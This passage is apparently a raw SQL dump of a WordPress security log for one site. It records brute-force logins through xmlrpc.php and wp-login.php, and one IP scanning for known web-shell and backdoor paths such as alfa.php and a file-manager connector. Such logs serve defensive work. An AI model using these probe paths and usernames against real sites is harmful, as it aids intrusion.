,0,0),('162.241.120.248',2733734136,'newd',0,1665871555.9728,152,'AvL5FmuPO0GYQ2ei1dUNrn73','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665870742.7737,152,'bAlw8OpoFDtCIZ0ME1zsRHjy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.211.115.226',3335746530,'newd',0,1665870444.1350,152,'BHETuxb6ZzNLVQ4kIh27nefm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.211.115.226',3335746530,'newd',0,1665870444.1062,152,'aoNQZUwc4zkqxHRygbmIlfeY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1665869378.9983,152,'Bry5RSU4xz9QAYvfqdI1Jk0K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1665869378.9959,152,'lL1290WzeYvPkBg5yi37btJs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.68.99.251',2755945467,'newd',0,1665868577.2140,152,'2xTkrlwHhUpSJ3PdmvVj8n0Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1665868305.9160,152,'IRTuw1hDCn6aScgytBfKP8HX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1665868305.9161,152,'VCblwELXt8ojIkZihr62eROn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1665881296.2105,152,'24VjeETbtfRdZ7LrUAvDXg5k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881294.5201,55,'dtDj0RpqFNZOyi4eE5lCKkSJ','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881289.0313,55,'Vzgf4IeZKwQNXMn9qtiy6vlJ','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('167.99.78.164',2808303268,'newd',0,1665874082.9723,152,'mX1yLh5QiJSHMF0nZBANxOjb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.19',3328324115,'Joyce',0,1665874778.5127,51,'0V7c1KRdlDqrw8Ax9t6WmkuG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1665873788.6267,152,'pd2f6waYALDmGvJMz9kgt8qb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1665873788.5940,152,'xtv9yGic2fZzEOp6FYRT0erm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.248.148.195',1845007555,'joyce',0,1665873327.6656,152,'UnfMOzdpcgtl9SkWiN1sEZX4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.52.252.69',221576261,'',0,1665873128.9025,55,'XIigz28cu7y4UjaxwShpRKML','','19|0|0|0|cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('209.141.47.94',3515690846,'Joyce',0,1665872855.7411,51,'tXqI6rgHZ2Ki0Sm1YvfAGjFw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.57.186.73',792312393,'newd',0,1665872655.1784,152,'PskwM15rGfyD8zxZvTBSAHRb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1665872655.1772,152,'wDbgCNd4A0Ej9yltPFO5iKoX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1665872253.4202,51,'CE8FW92DvP6qGO4eBMoytl5z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1665871828.9913,152,'rS9ov7PUV6QEzhZqkp5CHFiJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1665871828.9297,152,'l2u0cAmsbVBEPiyUQMHnLKO8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881286.0500,55,'BNcqEwg73oueaW6Y5PpsIhTS','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881282.7750,55,'i5EHhl28SGptsOumFqdNbV0g','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('119.8.58.8',1997027848,'newd',0,1665878830.5503,152,'IO8UmkM37W6YLls1XueGRQ9J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'newd',0,1665878830.5502,152,'0OQwHcfAKJEumdhkjrWDe6ML','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.222.127.109',2094956397,'newd',0,1665877889.1037,152,'71tzmZiYcPefuXr0SvqnbdUG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665877587.1656,152,'EzkKnMZ0CxYJ8mAih9lOtjPa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1665876458.6267,152,'kl8VXNzL3r4hFsTeCUf2Ytb5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1665877575.8927,152,'GRa2QYKncz3lyMi5H67Ovfwk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.209.117',2310590837,'newd',0,1665876458.5964,152,'nrq2dAypIOkz4Z8tRlvPeFfM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.186.19',3583556115,'Joyce',0,1665875780.2454,152,'XFC8jy0sYS5tv2LhODgeaRU7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665875243.5235,152,'tfdrF4sDkUpKTQgjwmyiM0ZA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665874950.3201,152,'PMRzrtWjbSwILZHhG71B9y8T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665874946.0080,152,'fK7urwlTqPhs4CeU2AI0GE3V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881276.7281,55,'tnaiVzH0ZRfNeDxUcY25Im4T','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881274.4674,55,'T4QU5MvFCXRArO3jc9IK7Lsb','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881273.3509,55,'a9sXSYMC7HZPLWi3OAF25yme','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881271.7547,55,'xmclQPpuSt5fDvbi6MZjFTdK','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881270.2964,100,'YJVHpozbZImWr62qTSiQRdD5','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881266.1691,100,'LY4gH9CyiK1OAGfU6eQ7ImRo','','13|0|0|0|cteisys.com/larva.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881262.9284,100,'6jS2rm7Mvi3LRENVenyPTWBq','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881261.0790,100,'mIPTxXtFdMw9cOy8lD3ZjrAp','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881259.8870,100,'8XauBem5gNxRfck3Qry9T4vA','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881254.3211,55,'W8txkJSsFDegmYy2hCvMcdwH','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881252.2653,55,'z9cwp0SaUXGNO8iRYxAIrbjZ','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881248.8693,10,'e8JsDuNaO7xFhKI6fTCnzjtl','','707|0|0|0|cteisys.com/boom.php',0,707,0),('85.31.46.140',1428106892,'',0,1665881248.8652,55,'e8JsDuNaO7xFhKI6fTCnzjtl','','19|0|0|0|cteisys.com/boom.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881186.4419,55,'Rba7jTDxAwyNHGhmSk3egJpd','','19|0|0|0|cteisys.com/admin.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881185.0987,55,'8bwrsDuh1iGB4pZ0kq3aTRLe','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881182.2736,55,'U0KrDbdGOyBN5ECwJS47ZWIV','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881172.7510,55,'K60i3xjbW5yYfmrGkS47NR9O','','19|0|0|0|cteisys.com/style.php',0,19,0),('103.27.238.234',1729883882,'newd',0,1665880412.4890,152,'3UfDnElCgPzTxd6qZVw10QLR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.163.194.31',3231957535,'newd',0,1665880072.3909,152,'nKI2sBdg8WXYT7xZiEHt9Mk0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1665879134.5496,152,'YFoufxM0j1NnV6aKvsmkPtRA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1665886462.7726,152,'m5xqPvRsa9iGAkXK4Wr7zgp1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1665886462.7699,152,'4W1EqJI0XFVOHdyv7fisK8Dn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1665885496.6782,152,'tPqbxRlve8U2hCcYNg7nWSQr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'newd',0,1665884196.4442,152,'iWmFPAID0UZBkcpoChVOa1XL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.95.162',1701011362,'newd',0,1665884196.1291,152,'fAjKypn5k7Mae68BsxirvVIu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1665883858.7223,152,'CEczKsBu20beH9rYlaL31T4p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1665883858.6897,152,'VKQ3tgOLU5XPhNWpuFDHwbd0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1665882882.7948,152,'U9JxhQDKIgticByzNl6MwmLv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1665882808.4009,51,'rhkS35GONUbi6yFx7QdjIou1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1665894591.1278,152,'nHP30Ce8BENTjQVLyqMhFWOw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1665894591.1277,152,'mCN2WTXgZpHYcqL4ARerwoUy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1665892236.6355,152,'8ZrI97yOwRoFXPH4hnfzYUWm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1665890852.3200,152,'avs5pCori7qGlV0IeQO4tjH3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.131.158',1138656158,'newd',0,1665890852.3056,152,'W7hnC8Z1fBeKsuOTcNF2IU3p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1665890516.0119,152,'5UfWb6HMczL813mBtpEwglnI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1665890515.9017,152,'TQFrWc72on5ul0kjbPdpvHeR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1665899957.3634,152,'7lYBkPOVKEvozfgAFt1p6byq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1665899957.3634,152,'BUYQAj8pdFu2T1wvlmP0yMiK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1665899096.3259,152,'w72pkuPnlv4txCHTyDBdiFqO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1665899096.3259,152,'Srz1fOuP5iF3AZqXtpoge0xn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.147',2249438099,'joyce',0,1665898593.0519,152,'ebULFnMsiyNExwXSl416fJqo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1665898427.5151,152,'23JOiGsAU7ym1E9FtfNgDIKk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1665898427.0957,152,'YHOyjzqMSL3XUErQ4Z7RgW5t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.211.125.40',3335748904,'newd',0,1665897566.2336,152,'lUMFuEdnVPsGO1Qqw6kA4S3W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.173.240.6',766373894,'newd',0,1665897566.2328,152,'iQwJ5sm8VMGrAEqRec3Yz0Bd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.45.66.25',3106751001,'newd',0,1665895891.4476,152,'KQCitlBbyVTLq8oAFMrXe9U1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.234.6',3483036166,'newd',0,1665895635.9038,152,'i3nW4cRIqx62dypJlXjaCs9b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.149.124',3497104764,'newd',0,1665895635.5970,152,'TSomvc628pzKVjiQuHn95sB3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.79',3583550031,'Joyce',0,1665895551.1688,152,'w6WClFtnLbApEPkR0TMYmINq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665895065.7414,51,'0KXMBvZ96rwxDO7EFcJfjRIy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1665894876.8007,152,'8g7rY5a1N9C2MoyTx3jckiVv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.211.45.155',3285396891,'newd',0,1665896794.1905,152,'LkzOca9y28UnGil4f1ZKCYXT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1665896717.2651,152,'NaKnFPfSC7lzYXDOmRrhk5JH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.162',1434488738,'newd',0,1665896492.5842,152,'GcxezLBfCTbQHta0h51rpm7Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('200.147.58.16',3365091856,'newd',0,1665896491.0331,152,'VLg0jodnQ6XFcNvSrJ5Y1mT7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665904168.5977,152,'8hY93GVTI2MxiRJfOzAg6woq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665904168.5970,152,'6sX7BUPKONmuZJrSHYqhAgd1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665903530.8079,152,'UEWB0mTRs7jctbNFhGz24aZ1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.32.211.172',2552288172,'newd',0,1665903304.3019,152,'nlpNYDE4gAVFiP97qdGcLb6j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.32.211.172',2552288172,'newd',0,1665903304.2310,152,'HMALKYBhZr8xd1IaDl2jE7J6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.234',3583549930,'joyce',0,1665903060.8342,152,'hO4TeKQGmnkbiwdxN35HE0Xo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.68.99',2160542819,'newd',0,1665902688.3875,152,'zSfqVgwAlGpP9FCkay746nvi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.79.7.22',575604502,'newd',0,1665902688.3606,152,'k2eHGcMo9KxvSJUsnyTbjCEZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.205.182.169',1842198185,'newd',0,1665901857.2110,152,'zTXZvHnIiL3D7qBWNcKwCOuy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1665901856.7346,152,'1K9ne7DblMU8AH3FOsif2LzJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.165',3583550117,'Joyce',0,1665901745.6745,152,'qVGwJFinpr1Yb345DRXmTBjK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.221.220.140',1742593164,'newd',0,1665901637.0558,152,'gwiHXxo17FzDeAapdcObVln4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.221.220.140',1742593164,'newd',0,1665901636.5983,152,'43PUmLaHyZgdfbpWGNR8oEQs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.124.182',3451485366,'Joyce',0,1665901559.5886,51,'QTt1IaLpqxdGm5AX3obKjkEr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.19',3328324115,'Joyce',0,1665901030.8021,51,'7AtZgQNdHXTykr8UMpwJCm5q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.195.135.67',600016707,'newd',0,1665900782.5724,152,'2qNlPUjr7biph46d0AESD5vX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.195.135.67',600016707,'newd',0,1665900782.5471,152,'qoG4kzalJu0jOt8veYdTUxVW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.16.103',2884898919,'newd',0,1665900152.3765,152,'a6SjNXZUIrAvc4D7HL1gTfeW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1665907096.9732,152,'fFgd3Bnx6jAZuPblQC5MNVDS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.85',3583549781,'Joyce',0,1665906967.2616,152,'mjc4qJIkUGYCfeZPT3rQ6wVE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'newd',0,1665906353.5291,152,'GREjsPmkTQegu0Bf5yAt3JDN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.101.168.131',778414211,'newd',0,1665906353.5290,152,'NAZXsQ7ij0YJvOHmFT4BRr3S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.19.137.116',773032308,'Joyce',0,1665906010.7478,152,'COSem76PuKxfQ9TLg5skAN08','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.121.252',3451484668,'Joyce',0,1665905871.7855,51,'2SagorukH9p4vK3eZBlyA8iz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.181.53',1739306293,'newd',0,1665905355.1389,152,'6YWaErecmCZB7vHXijSuyDdx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1665905121.7115,152,'6t8lpJk0c2wuWPZB9savUVEj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1665905121.7034,152,'AKSwejG57vxWYtyzD2b9qaks','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1665904436.2824,152,'SHEBNKfLxoePIrD8jdVCqZMF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665911461.2130,152,'jTwO5ULr4atKCH6YMkZ7guxD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665911461.2128,152,'ZebSVFTwGYPRaDd48uUKMnCf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1665910640.7693,152,'KlMIFnZ5Jjy3p16qoaG8Xcgx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'newd',0,1665910622.4188,152,'3NQw1VB4YOTi6oSqIrJxHk0d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.180.120.176',1739880624,'newd',0,1665910337.6207,152,'pVDUkfTrmw8PQ9NdgvOl10ju','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.12.67.132',1024213892,'newd',0,1665909498.7587,152,'PiHpItDORM4u6BYZULVJ0e89','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.33.26',795549978,'newd',0,1665909227.5533,152,'cQg2iKbsWwTafBtd5VN1xEzk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1665908432.1454,152,'p8Z0XfQOen3ylJ7sMW6mAovc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1665908431.5044,152,'TYQHngesDWNbi8PA61IodkZu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1665908155.6080,152,'3HElLnZcjMGi0tp7wFuV8xJC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('79.143.85.14',1334793486,'newd',0,1665908154.8301,152,'QLKCvAXzk8PMhoSfEFVagU2R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1665907379.0309,152,'cGrzy0DoluV6iSgwWJPkFb1B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.156',1738056860,'newd',0,1665914063.8670,152,'jmT8Zhac4K6I3XtCuvR0kqYJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1665914063.1756,152,'0G6ytYn9jiaRLKkOmw3AJdIz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.147.193',2671875009,'newd',0,1665913788.1191,152,'CMqkg5WTdvBhGxrFyRQUpYHI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.147.193',2671875009,'newd',0,1665913788.0526,152,'d1B2aKCWLy9pmbDAk8YXxQ0i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'newd',0,1665912897.7814,152,'3KaOpAM7v5C91dDrPGo60xnH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1665912897.6996,152,'KQFhfGBm2i4yS7E5xJPajMb6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1665912618.1128,152,'n9becVwTvUg7dZu6QoBCpOER','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1665912618.0620,152,'gsiQfX4WP3VlmjLoInkMarOE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.187.99',759020387,'Joyce',0,1665912036.5828,51,'7SxkoG4Uvd8Rn5yIfu0WJbPc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1665911757.3272,152,'KsPSYhzoL9VEbkMxAZUF3fq4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.240',3583549936,'Joyce',0,1665916578.7807,152,'cKUzCaojZWemdLsBnqO4phSr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'newd',0,1665915258.9278,152,'y7dOSksARoJqGTWejBtKxP0r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.105.232',866085352,'newd',0,1665921498.3021,152,'iS1OCsMr2QWoelHGmhDJNt6y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1665920230.3049,152,'hL6aAZRvotkIuOK3USqMbfy9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'Joyce',0,1665919191.3985,51,'pEfnMivHlg4oPuTybGAY5cmW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.244.254',2487809278,'newd',0,1665918963.2871,152,'DqICNyYMfktEuSPx5ilJZcO3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1665924682.3162,51,'eljaF5BPwOoNLpST3bZqQJAR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.120.192',1732933824,'wwwadmin',0,1665924601.9421,152,'zHAUClk7FWSIc2TvsXKqGxZL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'wwwadmin',0,1665924601.5136,152,'Pni5DjzF4QCvgKJ0klSbrM1w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1665924165.3880,51,'c97TSYiBZjeVQ0HvRflD6OKU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.117.30',2335929630,'wadminw',0,1665922944.8407,152,'NX5WC76DO9FpmyPVgxq08aYH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'wadminw',0,1665922944.8407,152,'AODksrNBCSoE8hLmZv0anjzu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1665932204.3702,7,'NAsIX2jCzyhD3pFw4MeQK7vm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.166.39.15',1386620687,'newd',0,1665932191.3566,7,'tEjrYHx1gNUs9OGZkPl54FQI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.42.231.47',2032854831,'newd',0,1665930671.9576,7,'RwA1cKJ2peuSZHDYNP6ob47I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.38.73.235',908478955,'newd',0,1665928327.5612,7,'txQUfXRBT5rpiJEeOY30IsZ8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.70.248.169',1363605673,'newd',0,1665928313.6957,7,'FEglaxPihHC2qMAwZko7nGIR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('3.34.104.242',52586738,'wadminw',0,1665926786.2363,51,'fRskzF7EJWpITQmZ5Ud6hvLO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'newd',0,1665930262.5459,7,'skjGuzIDa3rxmM2ERtJYNnKC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.171',1868207787,'wwwadmin',0,1665930005.4553,51,'ytRG7N0SWekVQCLlzaTJFr9A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.92.27.198',1734089670,'wwwadmin',0,1665930001.9885,51,'9rmsOeDpcEPjkFRJ1BndGWUL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('195.178.120.231',3283253479,'',0,1665929951.3274,55,'MFJsXALybdmgOSka3iUW0lG4','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/index.php',0,19,0),('195.178.120.231',3283253479,'',0,1665929922.7914,55,'TbPo183vJFRB2pOmGflLejDQ','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('103.221.220.140',1742593164,'wwwadmin',0,1665929342.3854,51,'7Y5ARVTdQxJ1GqOswZuKeL4k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.187',2249438139,'joyce',0,1665938411.0881,152,'cUlzqnePuv9Eg7byfVoR50pd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'Joyce',0,1665935034.3217,51,'Rgq8M0GiUDPebVdKTFaulcvt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'Joyce',0,1665934850.9872,51,'fQrAktOKcnGsxljHBompNSLv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1665934561.9782,7,'V2gthefKRUc1uH4o8sMxZGW7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1665934151.7127,7,'NmFjJ4SihwOE1rcpD7I9tyza','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.70.248.169',1363605673,'newd',0,1665938409.9993,7,'ZeUWOkhY9u3tsjgR61MC5iLP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1665937993.7809,7,'jvmThlx9nJEtRUoDKSHb67aN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1665936085.4558,7,'ijBUESToAnd6OmwF3v1L09yZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.100.142',2160551054,'newd',0,1665936072.8456,7,'Bf